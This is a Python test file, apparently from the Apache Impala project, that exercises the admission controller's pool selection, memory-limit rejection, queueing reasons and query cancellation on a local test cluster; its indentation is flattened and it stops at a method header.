class TestAdmissionControllerBase(CustomClusterTestSuite):
@classmethod
  def get_workload(cls):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestAdmissionControllerBase, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_dimension(create_single_exec_option_dimension())
# There's no reason to test this on other file formats/compression codecs right now
cls.ImpalaTestMatrix.add_dimension(
create_uncompressed_text_dimension(cls.get_workload()))
class TestAdmissionController(TestAdmissionControllerBase, HS2TestSuite):
def __check_pool_rejected(self, client, pool, expected_error_re):
try:
client.set_configuration({'request_pool': pool})
client.execute("select 1")
assert False, "Query should return error"
except ImpalaBeeswaxException as e:
assert re.search(expected_error_re, str(e))
def __check_query_options(self, profile, expected_query_options):
"""Validate that the expected per-pool query options were set on the specified
profile. expected_query_options is a list of "KEY=VALUE" strings, e.g.
["MEM_LIMIT=1", ...]"""
confs = []
for line in profile.split("\n"):
if PROFILE_QUERY_OPTIONS_KEY in line:
rhs = re.split(": ", line)[1]
confs = re.split(",", rhs)
break
expected_set = set([x.lower() for x in expected_query_options])
confs_set = set([x.lower() for x in confs])
assert expected_set.issubset(confs_set)
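  # Sketch of the profile line parsed by __check_query_options (values illustrative):
  #   Query Options (set by configuration): MEM_LIMIT=12345,REQUEST_POOL=root.queueA
  # Splitting on ": " and then on "," yields the per-query options, which are
  # lower-cased and compared as a set against the expected "KEY=VALUE" strings.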
def __check_hs2_query_opts(self, pool_name, mem_limit=None, expected_options=None):
""" Submits a query via HS2 (optionally with a mem_limit in the confOverlay)
into pool_name and checks that the expected_query_options are set in the
profile."""
execute_statement_req = TCLIService.TExecuteStatementReq()
execute_statement_req.sessionHandle = self.session_handle
execute_statement_req.confOverlay = {'request_pool': pool_name}
if mem_limit is not None: execute_statement_req.confOverlay['mem_limit'] = mem_limit
execute_statement_req.statement = "select 1"
execute_statement_resp = self.hs2_client.ExecuteStatement(execute_statement_req)
HS2TestSuite.check_response(execute_statement_resp)
fetch_results_req = TCLIService.TFetchResultsReq()
fetch_results_req.operationHandle = execute_statement_resp.operationHandle
fetch_results_req.maxRows = 1
fetch_results_resp = self.hs2_client.FetchResults(fetch_results_req)
HS2TestSuite.check_response(fetch_results_resp)
close_operation_req = TCLIService.TCloseOperationReq()
close_operation_req.operationHandle = execute_statement_resp.operationHandle
HS2TestSuite.check_response(self.hs2_client.CloseOperation(close_operation_req))
get_profile_req = ImpalaHiveServer2Service.TGetRuntimeProfileReq()
get_profile_req.operationHandle = execute_statement_resp.operationHandle
get_profile_req.sessionHandle = self.session_handle
get_profile_resp = self.hs2_client.GetRuntimeProfile(get_profile_req)
HS2TestSuite.check_response(get_profile_resp)
self.__check_query_options(get_profile_resp.profile, expected_options)
def _execute_and_collect_profiles(self, queries, timeout_s, config_options={},
allow_query_failure=False):
"""Submit the query statements in 'queries' in parallel to the first impalad in
the cluster. After submission, the results are fetched from the queries in
sequence and their profiles are collected. Wait for up to timeout_s for
each query to finish. If 'allow_query_failure' is True, succeeds if the query
completes successfully or ends up in the EXCEPTION state. Otherwise expects the
queries to complete successfully.
Returns the profile strings."""
client = self.cluster.impalads[0].service.create_beeswax_client()
expected_states = [client.QUERY_STATES['FINISHED']]
if allow_query_failure:
expected_states.append(client.QUERY_STATES['EXCEPTION'])
try:
handles = []
profiles = []
client.set_configuration(config_options)
for query in queries:
handles.append(client.execute_async(query))
for query, handle in zip(queries, handles):
state = self.wait_for_any_state(handle, expected_states, timeout_s)
if state == client.QUERY_STATES['FINISHED']:
self.client.fetch(query, handle)
profiles.append(self.client.get_runtime_profile(handle))
return profiles
finally:
client.close()
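  # Typical use of _execute_and_collect_profiles in the tests below (illustrative):
  #   profiles = self._execute_and_collect_profiles(["select sleep(100)"] * 5, 60)
  #   queued = [p for p in profiles if "Admission result: Queued" in p]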
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(
fs_allocation_file="fair-scheduler-test2.xml",
llama_site_file="llama-site-test2.xml"),
default_query_options=[('mem_limit', 200000000)],
statestored_args=_STATESTORED_ARGS)
@needs_session(conf_overlay={'batch_size': '100'})
def test_set_request_pool(self):
"""Tests setting the REQUEST_POOL with the pool placement policy configured
to require a specific pool, and validate that the per-pool configurations were
applied."""
impalad = self.cluster.impalads[0]
client = impalad.service.create_beeswax_client()
# Expected default mem limit for queueA, used in several tests below
queueA_mem_limit = "MEM_LIMIT=%s" % (128 * 1024 * 1024)
try:
for pool in ['', 'not_a_pool_name']:
        expected_error = \
            r"No mapping found for request from user '\S+' with requested pool '%s'" \
            % (pool)
self.__check_pool_rejected(client, pool, expected_error)
# Check rejected if user does not have access.
expected_error = "Request from user '\S+' with requested pool 'root.queueC' "\
"denied access to assigned pool 'root.queueC'"
self.__check_pool_rejected(client, 'root.queueC', expected_error)
# Also try setting a valid pool
client.set_configuration({'request_pool': 'root.queueB'})
result = client.execute("select 1")
# Query should execute in queueB which doesn't have a default mem limit set in the
# llama-site.xml, so it should inherit the value from the default process query
# options.
self.__check_query_options(result.runtime_profile,
['MEM_LIMIT=200000000', 'REQUEST_POOL=root.queueB'])
# Try setting the pool for a queue with a very low queue timeout.
# queueA allows only 1 running query and has a queue timeout of 50ms, so the
# second concurrent query should time out quickly.
client.set_configuration({'request_pool': 'root.queueA'})
handle = client.execute_async("select sleep(1000)")
# Wait for query to clear admission control and get accounted for
client.wait_for_admission_control(handle)
self.__check_pool_rejected(client, 'root.queueA', "exceeded timeout")
assert client.get_state(handle) == client.QUERY_STATES['FINISHED']
# queueA has default query options mem_limit=128m,query_timeout_s=5
self.__check_query_options(client.get_runtime_profile(handle),
[queueA_mem_limit, 'QUERY_TIMEOUT_S=5', 'REQUEST_POOL=root.queueA'])
client.close_query(handle)
# Should be able to set query options via the set command (overriding defaults if
# applicable). mem_limit overrides the pool default. abort_on_error has no
# proc/pool default.
client.execute("set mem_limit=31337")
client.execute("set abort_on_error=1")
result = client.execute("select 1")
self.__check_query_options(result.runtime_profile,
['MEM_LIMIT=31337', 'ABORT_ON_ERROR=1', 'QUERY_TIMEOUT_S=5',
'REQUEST_POOL=root.queueA'])
# Should be able to set query options (overriding defaults if applicable) with the
# config overlay sent with the query RPC. mem_limit is a pool-level override and
# max_io_buffers has no proc/pool default.
client.set_configuration({'request_pool': 'root.queueA', 'mem_limit': '12345'})
result = client.execute("select 1")
self.__check_query_options(result.runtime_profile,
['MEM_LIMIT=12345', 'QUERY_TIMEOUT_S=5', 'REQUEST_POOL=root.queueA',
'ABORT_ON_ERROR=1'])
# Once options are reset to their defaults, the queue
# configuration should kick back in. We'll see the
# queue-configured mem_limit, and we won't see
# abort on error, because it's back to being the default.
client.execute('set mem_limit=""')
client.execute('set abort_on_error=""')
client.set_configuration({'request_pool': 'root.queueA'})
result = client.execute("select 1")
self.__check_query_options(result.runtime_profile,
[queueA_mem_limit, 'REQUEST_POOL=root.queueA', 'QUERY_TIMEOUT_S=5'])
finally:
client.close()
# HS2 tests:
    # batch_size is set in the HS2 OpenSession() call via the needs_session() test
    # decorator, so it is included in all test cases below.
batch_size = "BATCH_SIZE=100"
# Check HS2 query in queueA gets the correct query options for the pool.
self.__check_hs2_query_opts("root.queueA", None,
[queueA_mem_limit, 'QUERY_TIMEOUT_S=5', 'REQUEST_POOL=root.queueA', batch_size])
# Check overriding the mem limit sent in the confOverlay with the query.
self.__check_hs2_query_opts("root.queueA", '12345',
['MEM_LIMIT=12345', 'QUERY_TIMEOUT_S=5', 'REQUEST_POOL=root.queueA', batch_size])
# Check HS2 query in queueB gets the process-wide default query options
self.__check_hs2_query_opts("root.queueB", None,
['MEM_LIMIT=200000000', 'REQUEST_POOL=root.queueB', batch_size])
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(
fs_allocation_file="fair-scheduler-test2.xml",
llama_site_file="llama-site-test2.xml",
additional_args="-require_username"),
statestored_args=_STATESTORED_ARGS)
def test_require_user(self):
open_session_req = TCLIService.TOpenSessionReq()
open_session_req.username = ""
open_session_resp = self.hs2_client.OpenSession(open_session_req)
TestAdmissionController.check_response(open_session_resp)
try:
execute_statement_req = TCLIService.TExecuteStatementReq()
execute_statement_req.sessionHandle = open_session_resp.sessionHandle
execute_statement_req.statement = "select count(1) from functional.alltypes"
execute_statement_resp = self.hs2_client.ExecuteStatement(execute_statement_req)
self.wait_for_operation_state(execute_statement_resp.operationHandle,
TCLIService.TOperationState.ERROR_STATE)
get_operation_status_resp = self.get_operation_status(
execute_statement_resp.operationHandle)
assert "User must be specified" in get_operation_status_resp.errorMessage
finally:
close_req = TCLIService.TCloseSessionReq()
close_req.sessionHandle = open_session_resp.sessionHandle
TestAdmissionController.check_response(self.hs2_client.CloseSession(close_req))
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=1,
pool_max_mem=10 * 1024 * 1024, proc_mem_limit=1024 * 1024 * 1024),
statestored_args=_STATESTORED_ARGS)
def test_trivial_coord_query_limits(self):
"""Tests that trivial coordinator only queries have negligible resource requirements.
"""
if self.exploration_strategy() != 'exhaustive':
pytest.skip('runs only in exhaustive')
# Queries with only constant exprs or limit 0 should be admitted.
self.execute_query_expect_success(self.client, "select 1")
self.execute_query_expect_success(self.client,
"select * from functional.alltypes limit 0")
non_trivial_queries = [
"select * from functional.alltypesagg limit 1",
"select * from functional.alltypestiny"]
for query in non_trivial_queries:
ex = self.execute_query_expect_failure(self.client, query)
assert re.search("Rejected query from pool default-pool: request memory needed "
".* is greater than pool max mem resources 10.00 MB", str(ex))
@SkipIfS3.hdfs_block_size
@SkipIfABFS.hdfs_block_size
@SkipIfADLS.hdfs_block_size
@SkipIfEC.fix_later
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=1,
pool_max_mem=40 * 1024 * 1024, proc_mem_limit=1024 * 1024 * 1024),
statestored_args=_STATESTORED_ARGS)
def test_memory_rejection(self, vector):
"""Test that rejection of queries based on reservation and estimates works as
    expected. The test depends on scanner memory estimates, which differ on remote
    filesystems with different (synthetic) block sizes."""
# Test that the query will be rejected by admission control if:
# a) the largest per-backend min buffer reservation is larger than the query mem limit
# b) the largest per-backend min buffer reservation is larger than the
# buffer_pool_limit query option
# c) the cluster-wide min-buffer reservation size is larger than the pool memory
# resources.
self.run_test_case('QueryTest/admission-reject-min-reservation', vector)
# Test that queries are rejected based on memory estimates. Set num_nodes=1 to
# avoid unpredictability from scheduling on different backends.
exec_options = vector.get_value('exec_option')
exec_options['num_nodes'] = 1
self.run_test_case('QueryTest/admission-reject-mem-estimate', vector)
# Process mem_limit used in test_mem_limit_upper_bound
PROC_MEM_TEST_LIMIT = 1024 * 1024 * 1024
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=1,
pool_max_mem=10 * PROC_MEM_TEST_LIMIT, proc_mem_limit=PROC_MEM_TEST_LIMIT))
def test_mem_limit_upper_bound(self, vector):
""" Test to ensure that a query is admitted if the requested memory is equal to the
process mem limit"""
query = "select * from functional.alltypesagg limit 1"
exec_options = vector.get_value('exec_option')
# Setting requested memory equal to process memory limit
exec_options['mem_limit'] = self.PROC_MEM_TEST_LIMIT
self.execute_query_expect_success(self.client, query, exec_options)
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=1,
pool_max_mem=10 * PROC_MEM_TEST_LIMIT, proc_mem_limit=PROC_MEM_TEST_LIMIT),
num_exclusive_coordinators=1)
def test_mem_limit_dedicated_coordinator(self, vector):
"""Regression test for IMPALA-8469: coordinator fragment should be admitted on
dedicated coordinator"""
query = "select * from functional.alltypesagg limit 1"
exec_options = vector.get_value('exec_option')
# Test both single-node and distributed plans
for num_nodes in [0, 1]:
# Memory just fits in memory limits
exec_options['mem_limit'] = self.PROC_MEM_TEST_LIMIT
exec_options['num_nodes'] = num_nodes
self.execute_query_expect_success(self.client, query, exec_options)
# A bit too much memory to run on coordinator.
      exec_options['mem_limit'] = int(self.PROC_MEM_TEST_LIMIT * 1.1)
ex = self.execute_query_expect_failure(self.client, query, exec_options)
assert ("Rejected query from pool default-pool: request memory needed "
"1.10 GB is greater than memory available for admission 1.00 GB" in
str(ex)), str(ex)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(
fs_allocation_file="mem-limit-test-fair-scheduler.xml",
llama_site_file="mem-limit-test-llama-site.xml"), num_exclusive_coordinators=1,
cluster_size=2)
def test_dedicated_coordinator_mem_accounting(self, vector):
"""Verify that when using dedicated coordinators, the memory admitted for and the
mem limit applied to the query fragments running on the coordinator is different than
the ones on executors."""
self.__verify_mem_accounting(vector, using_dedicated_coord_estimates=True)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(
fs_allocation_file="mem-limit-test-fair-scheduler.xml",
llama_site_file="mem-limit-test-llama-site.xml")
+ " -use_dedicated_coordinator_estimates false",
num_exclusive_coordinators=1,
cluster_size=2)
def test_dedicated_coordinator_legacy_mem_accounting(self, vector):
"""Verify that when using dedicated coordinators with specialized dedicated coord
estimates turned off using a hidden startup param, the memory admitted for and the
mem limit applied to the query fragments running on the coordinator is the same
(as expected from legacy behavior)."""
self.__verify_mem_accounting(vector, using_dedicated_coord_estimates=False)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(
fs_allocation_file="mem-limit-test-fair-scheduler.xml",
llama_site_file="mem-limit-test-llama-site.xml"), num_exclusive_coordinators=1,
cluster_size=2)
def test_sanity_checks_dedicated_coordinator(self, vector, unique_database):
"""Sanity tests for verifying targeted dedicated coordinator memory estimations and
behavior."""
self.client.set_configuration_option('request_pool', "root.regularPool")
ImpalaTestSuite.change_database(self.client, vector.get_value('table_format'))
exec_options = vector.get_value('exec_option')
# Make sure query option MAX_MEM_ESTIMATE_FOR_ADMISSION is enforced on the dedicated
# coord estimates. Without this query option the estimate would be > 100MB.
expected_mem = 60 * (1 << 20) # 60MB
exec_options['MAX_MEM_ESTIMATE_FOR_ADMISSION'] = expected_mem
self.client.set_configuration(exec_options)
handle = self.client.execute_async(QUERY.format(1))
self.client.wait_for_finished_timeout(handle, 1000)
mem_to_admit = self.__get_mem_limits_admission_debug_page()
assert abs(mem_to_admit['coordinator'] - expected_mem) < 0.0001,\
"mem_to_admit:" + str(mem_to_admit)
assert abs(mem_to_admit['executor'] - expected_mem) < 0.0001, \
"mem_to_admit:" + str(mem_to_admit)
self.client.close_query(handle)
# If the query is only scheduled on the coordinator then the mem to admit on executor
# should be zero.
exec_options['NUM_NODES'] = 1
self.client.set_configuration(exec_options)
handle = self.client.execute_async(QUERY.format(1))
self.client.wait_for_finished_timeout(handle, 1000)
mem_to_admit = self.__get_mem_limits_admission_debug_page()
assert abs(mem_to_admit['coordinator'] - expected_mem) < 0.0001, \
"mem_to_admit:" + str(mem_to_admit)
assert abs(mem_to_admit['executor'] - 0) < 0.0001, \
"mem_to_admit:" + str(mem_to_admit)
self.client.close_query(handle)
# Make sure query execution works perfectly for a query that does not have any
    # fragments scheduled on the coordinator, but has runtime filters that need to be
# aggregated at the coordinator.
exec_options = vector.get_value('exec_option')
exec_options['RUNTIME_FILTER_WAIT_TIME_MS'] = 30000
query = """CREATE TABLE {0}.temp_tbl AS SELECT STRAIGHT_JOIN o_orderkey
FROM tpch_parquet.lineitem INNER JOIN [SHUFFLE] tpch_parquet.orders
ON o_orderkey = l_orderkey GROUP BY 1""".format(unique_database)
result = self.execute_query_expect_success(self.client, query, exec_options)
assert "Runtime filters: All filters arrived" in result.runtime_profile
def __verify_mem_accounting(self, vector, using_dedicated_coord_estimates):
"""Helper method used by test_dedicated_coordinator_*_mem_accounting that verifies
the actual vs expected values for mem admitted and mem limit for both coord and
executor. Also verifies that those memory values are different if
'using_dedicated_coord_estimates' is true."""
self.client.set_configuration_option('request_pool', "root.regularPool")
ImpalaTestSuite.change_database(self.client, vector.get_value('table_format'))
# Use a test query that has unpartitioned non-coordinator fragments to make
# sure those are handled correctly (IMPALA-10036).
for query in [QUERY, QUERY_WITH_UNPARTITIONED_FRAGMENTS]:
handle = self.client.execute_async(query.format(1))
self.client.wait_for_finished_timeout(handle, 1000)
expected_mem_limits = self.__get_mem_limits_admission_debug_page()
actual_mem_limits = self.__get_mem_limits_memz_debug_page(handle.get_handle().id)
mem_admitted = get_mem_admitted_backends_debug_page(self.cluster)
debug_string = " expected_mem_limits:" + str(
expected_mem_limits) + " actual_mem_limits:" + str(
actual_mem_limits) + " mem_admitted:" + str(mem_admitted)
MB = 1 << 20
      # Easiest way to check float inequality.
assert abs(expected_mem_limits['coordinator'] - expected_mem_limits[
'executor']) > 0.0001 or not using_dedicated_coord_estimates, debug_string
# There may be some rounding errors so keep a margin of 5MB when verifying
assert abs(actual_mem_limits['coordinator'] - expected_mem_limits[
'coordinator']) < 5 * MB, debug_string
assert abs(actual_mem_limits['executor'] - expected_mem_limits[
'executor']) < 5 * MB, debug_string
assert abs(mem_admitted['coordinator'] - expected_mem_limits[
'coordinator']) < 5 * MB, debug_string
assert abs(
mem_admitted['executor'][0] - expected_mem_limits['executor']) < 5 * MB, \
debug_string
# Ensure all fragments finish executing before running next query.
self.client.fetch(query, handle)
self.client.close_query(handle)
def __get_mem_limits_admission_debug_page(self):
"""Helper method assumes a 2 node cluster using a dedicated coordinator. Returns the
mem_limit calculated by the admission controller from the impala admission debug page
of the coordinator impala daemon. Returns a dictionary with the keys 'coordinator'
and 'executor' and their respective mem values in bytes."""
# Based on how the cluster is setup, the first impalad in the cluster is the
# coordinator.
response_json = self.cluster.impalads[0].service.get_debug_webpage_json("admission")
assert 'resource_pools' in response_json
assert len(response_json['resource_pools']) == 1
assert response_json['resource_pools'][0]['running_queries']
assert len(response_json['resource_pools'][0]['running_queries']) == 1
query_info = response_json['resource_pools'][0]['running_queries'][0]
return {'coordinator': float(query_info["coord_mem_to_admit"]),
'executor': float(query_info["mem_limit"])}
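  # The /admission JSON consumed above is assumed to look roughly like (sketch only):
  #   {"resource_pools": [{"running_queries": [
  #       {"coord_mem_to_admit": "157286400", "mem_limit": "52428800", ...}]}]}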
def __get_mem_limits_memz_debug_page(self, query_id):
"""Helper method assumes a 2 node cluster using a dedicated coordinator. Returns the
mem limits enforced on the query (identified by the 'query_id') extracted from
mem-tracker's output on the memz debug page of the dedicated coordinator and the
executor impala daemons. Returns a dictionary with the keys 'coordinator' and
'executor' and their respective mem values in bytes."""
metric_name = "Query({0})".format(query_id)
# Based on how the cluster is setup, the first impalad in the cluster is the
# coordinator.
mem_trackers = [MemUsageVerifier(i.service).get_mem_usage_values(metric_name) for i in
self.cluster.impalads]
return {'coordinator': float(mem_trackers[0]['limit']),
'executor': float(mem_trackers[1]['limit'])}
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(num_exclusive_coordinators=1)
def test_dedicated_coordinator_planner_estimates(self, vector, unique_database):
"""Planner tests to add coverage for coordinator estimates when using dedicated
coordinators. Also includes coverage for verifying cluster memory admitted."""
vector_copy = copy(vector)
exec_options = vector_copy.get_value('exec_option')
# Remove num_nodes from the options to allow test case runner to set it in one of
# the test cases.
del exec_options['num_nodes']
exec_options['num_scanner_threads'] = 1 # To make estimates consistently reproducible
self.run_test_case('QueryTest/dedicated-coord-mem-estimates', vector_copy,
unique_database)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(num_exclusive_coordinators=1, cluster_size=2)
def test_mem_limit_executors(self, vector, unique_database):
"""Verify that the query option mem_limit_executors is only enforced on the
executors."""
expected_exec_mem_limit = "999999999"
ImpalaTestSuite.change_database(self.client, vector.get_value('table_format'))
self.client.set_configuration({"MEM_LIMIT_EXECUTORS": expected_exec_mem_limit})
handle = self.client.execute_async(QUERY.format(1))
self.client.wait_for_finished_timeout(handle, 1000)
expected_mem_limits = self.__get_mem_limits_admission_debug_page()
assert expected_mem_limits['executor'] > expected_mem_limits[
'coordinator'], expected_mem_limits
assert expected_mem_limits['executor'] == float(
expected_exec_mem_limit), expected_mem_limits
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=2, max_queued=1,
pool_max_mem=10 * PROC_MEM_TEST_LIMIT,
queue_wait_timeout_ms=2 * STATESTORE_RPC_FREQUENCY_MS),
start_args="--per_impalad_args=-mem_limit=3G;-mem_limit=3G;-mem_limit=2G",
statestored_args=_STATESTORED_ARGS)
def test_heterogeneous_proc_mem_limit(self, vector):
""" Test to ensure that the admission controller takes into account the actual proc
mem limits of each impalad. Starts a cluster where the last impalad has a smaller
proc mem limit than other impalads and runs queries where admission/rejection decision
depends on the coordinator knowing the other impalad's mem limits.
The queue_wait_timeout_ms has been set to be more than the prioritized statestore
update time, so that the queries don't time out before receiving updates to pool
stats"""
# Choose a query that runs on all 3 backends.
query = "select * from functional.alltypesagg, (select 1) B limit 1"
# Successfully run a query with mem limit equal to the lowest process memory among
# impalads
exec_options = copy(vector.get_value('exec_option'))
exec_options['mem_limit'] = "2G"
self.execute_query_expect_success(self.client, query, exec_options)
# Test that a query scheduled to run on a single node and submitted to the impalad
# with higher proc mem limit succeeds.
exec_options = copy(vector.get_value('exec_option'))
exec_options['mem_limit'] = "3G"
exec_options['num_nodes'] = "1"
self.execute_query_expect_success(self.client, query, exec_options)
# Exercise rejection checks in admission controller.
try:
exec_options = copy(vector.get_value('exec_option'))
exec_options['mem_limit'] = "3G"
self.execute_query(query, exec_options)
except ImpalaBeeswaxException as e:
assert re.search("Rejected query from pool \S+: request memory needed 3.00 GB"
" is greater than memory available for admission 2.00 GB of \S+", str(e)), \
str(e)
# Exercise queuing checks in admission controller.
    # Make sure the client handle is defined even if an early step in the try fails.
    impalad_with_2g_mem = None
    try:
# Wait for previous queries to finish to avoid flakiness.
for impalad in self.cluster.impalads:
impalad.service.wait_for_metric_value("impala-server.num-fragments-in-flight", 0)
impalad_with_2g_mem = self.cluster.impalads[2].service.create_beeswax_client()
impalad_with_2g_mem.set_configuration_option('mem_limit', '1G')
impalad_with_2g_mem.execute_async("select sleep(1000)")
# Wait for statestore update to update the mem admitted in each node.
      # Use float division so this sleeps ~0.1s rather than 0s under Python 2.
      sleep(STATESTORE_RPC_FREQUENCY_MS / 1000.0)
exec_options = copy(vector.get_value('exec_option'))
exec_options['mem_limit'] = "2G"
      # Since queuing is synchronous and we can't close the previous query until this
      # returns, we wait for this query to time out instead.
self.execute_query(query, exec_options)
except ImpalaBeeswaxException as e:
assert re.search("Queued reason: Not enough memory available on host \S+.Needed "
"2.00 GB but only 1.00 GB out of 2.00 GB was available.", str(e)), str(e)
finally:
if impalad_with_2g_mem is not None:
impalad_with_2g_mem.close()
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--logbuflevel=-1 " + impalad_admission_ctrl_flags(max_requests=1,
max_queued=1, pool_max_mem=PROC_MEM_TEST_LIMIT),
statestored_args=_STATESTORED_ARGS)
def test_cancellation(self):
""" Test to confirm that all Async cancellation windows are hit and are able to
succesfully cancel the query"""
impalad = self.cluster.impalads[0]
client = impalad.service.create_beeswax_client()
try:
client.set_configuration_option("debug_action", "AC_BEFORE_ADMISSION:SLEEP@2000")
client.set_configuration_option("mem_limit", self.PROC_MEM_TEST_LIMIT + 1)
handle = client.execute_async("select 1")
sleep(1)
client.close_query(handle)
self.assert_impalad_log_contains('INFO',
"Ready to be Rejected but already cancelled, query id=")
client.clear_configuration()
client.set_configuration_option("debug_action", "AC_BEFORE_ADMISSION:SLEEP@2000")
handle = client.execute_async("select 2")
sleep(1)
client.close_query(handle)
self.assert_impalad_log_contains('INFO',
"Ready to be Admitted immediately but already cancelled, query id=")
client.set_configuration_option("debug_action",
"CRS_BEFORE_COORD_STARTS:SLEEP@2000")
handle = client.execute_async("select 3")
sleep(1)
client.close_query(handle)
self.assert_impalad_log_contains('INFO',
"Cancelled right after starting the coordinator query id=")
client.set_configuration_option("debug_action", "CRS_AFTER_COORD_STARTS:SLEEP@2000")
handle = client.execute_async("select 4")
sleep(1)
client.close_query(handle)
self.assert_impalad_log_contains('INFO',
"Cancelled right after starting the coordinator query id=", 2)
client.clear_configuration()
handle = client.execute_async("select sleep(10000)")
client.set_configuration_option("debug_action",
"AC_AFTER_ADMISSION_OUTCOME:SLEEP@2000")
queued_query_handle = client.execute_async("select 5")
sleep(1)
assert client.get_state(queued_query_handle) == QueryState.COMPILED
assert "Admission result: Queued" in client.get_runtime_profile(queued_query_handle)
      # Only cancel the queued query; close() would block until it unregisters. This
      # gives us a chance to close the running query and allow the dequeue thread to
      # dequeue the queued query.
client.cancel(queued_query_handle)
client.close_query(handle)
client.close_query(queued_query_handle)
queued_profile = client.get_runtime_profile(queued_query_handle)
assert "Admission result: Cancelled (queued)" in queued_profile, queued_profile
self.assert_impalad_log_contains('INFO', "Dequeued cancelled query=")
client.clear_configuration()
handle = client.execute_async("select sleep(10000)")
queued_query_handle = client.execute_async("select 6")
sleep(1)
assert client.get_state(queued_query_handle) == QueryState.COMPILED
assert "Admission result: Queued" in client.get_runtime_profile(queued_query_handle)
client.close_query(queued_query_handle)
client.close_query(handle)
queued_profile = client.get_runtime_profile(queued_query_handle)
assert "Admission result: Cancelled (queued)" in queued_profile
for i in self.cluster.impalads:
i.service.wait_for_metric_value("impala-server.num-fragments-in-flight", 0)
assert self.cluster.impalads[0].service.get_metric_value(
"admission-controller.agg-num-running.default-pool") == 0
assert self.cluster.impalads[0].service.get_metric_value(
"admission-controller.total-admitted.default-pool") == 4
assert self.cluster.impalads[0].service.get_metric_value(
"admission-controller.total-queued.default-pool") == 2
finally:
client.close()
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=10,
pool_max_mem=1024 * 1024 * 1024),
statestored_args=_STATESTORED_ARGS)
def test_queue_reasons_num_queries(self):
"""Test that queue details appear in the profile when queued based on num_queries."""
# Run a bunch of queries - one should get admitted immediately, the rest should
# be dequeued one-by-one.
STMT = "select sleep(1000)"
TIMEOUT_S = 60
EXPECTED_REASON = \
"Latest admission queue reason: number of running queries 1 is at or over limit 1"
NUM_QUERIES = 5
    profiles = self._execute_and_collect_profiles([STMT for i in range(NUM_QUERIES)],
TIMEOUT_S)
num_reasons = len([profile for profile in profiles if EXPECTED_REASON in profile])
assert num_reasons == NUM_QUERIES - 1, \
"All queries except first should have been queued: " + '\n===\n'.join(profiles)
init_queue_reasons = self.__extract_init_queue_reasons(profiles)
assert len(init_queue_reasons) == NUM_QUERIES - 1, \
"All queries except first should have been queued: " + '\n===\n'.join(profiles)
over_limit_details = [detail
for detail in init_queue_reasons if 'number of running queries' in detail]
assert len(over_limit_details) == 1, \
"One query initially queued because of num_queries: " + '\n===\n'.join(profiles)
queue_not_empty_details = [detail
for detail in init_queue_reasons if 'queue is not empty' in detail]
assert len(queue_not_empty_details) == NUM_QUERIES - 2, \
"Others queued because of non-empty queue: " + '\n===\n'.join(profiles)
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=10, max_queued=10,
pool_max_mem=10 * 1024 * 1024),
statestored_args=_STATESTORED_ARGS)
def test_queue_reasons_memory(self):
"""Test that queue details appear in the profile when queued based on memory."""
# Run a bunch of queries with mem_limit set so that only one can be admitted at a
# time- one should get admitted immediately, the rest should be dequeued one-by-one.
STMT = "select sleep(100)"
TIMEOUT_S = 60
EXPECTED_REASON = "Latest admission queue reason: Not enough aggregate memory " +\
"available in pool default-pool with max mem resources 10.00 MB. Needed 9.00 MB" \
" but only 1.00 MB was available."
NUM_QUERIES = 5
    profiles = self._execute_and_collect_profiles([STMT for i in range(NUM_QUERIES)],
TIMEOUT_S, {'mem_limit': '9mb'})
num_reasons = len([profile for profile in profiles if EXPECTED_REASON in profile])
assert num_reasons == NUM_QUERIES - 1, \
"All queries except first should have been queued: " + '\n===\n'.join(profiles)
init_queue_reasons = self.__extract_init_queue_reasons(profiles)
assert len(init_queue_reasons) == NUM_QUERIES - 1, \
"All queries except first should have been queued: " + '\n===\n'.join(profiles)
over_limit_details = [detail for detail in init_queue_reasons
if 'Not enough aggregate memory available' in detail]
assert len(over_limit_details) == 1, \
"One query initially queued because of memory: " + '\n===\n'.join(profiles)
queue_not_empty_details = [detail
for detail in init_queue_reasons if 'queue is not empty' in detail]
assert len(queue_not_empty_details) == NUM_QUERIES - 2, \
"Others queued because of non-empty queue: " + '\n===\n'.join(profiles)
def __extract_init_queue_reasons(self, profiles):
"""Return a list of the 'Admission Queue details' strings found in 'profiles'"""
matches = [re.search(INITIAL_QUEUE_REASON_REGEX, profile) for profile in profiles]
return [match.group(0) for match in matches if match is not None]
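  # Example of a profile line matched by INITIAL_QUEUE_REASON_REGEX (illustrative):
  #   Initial admission queue reason: waited 123 ms, reason: queue is not empty ...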
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=10, max_queued=10,
pool_max_mem=10 * 1024 * 1024, proc_mem_limit=2 * 1024 * 1024,
queue_wait_timeout_ms=1000),
statestored_args=_STATESTORED_ARGS)
def test_timeout_reason_host_memory(self):
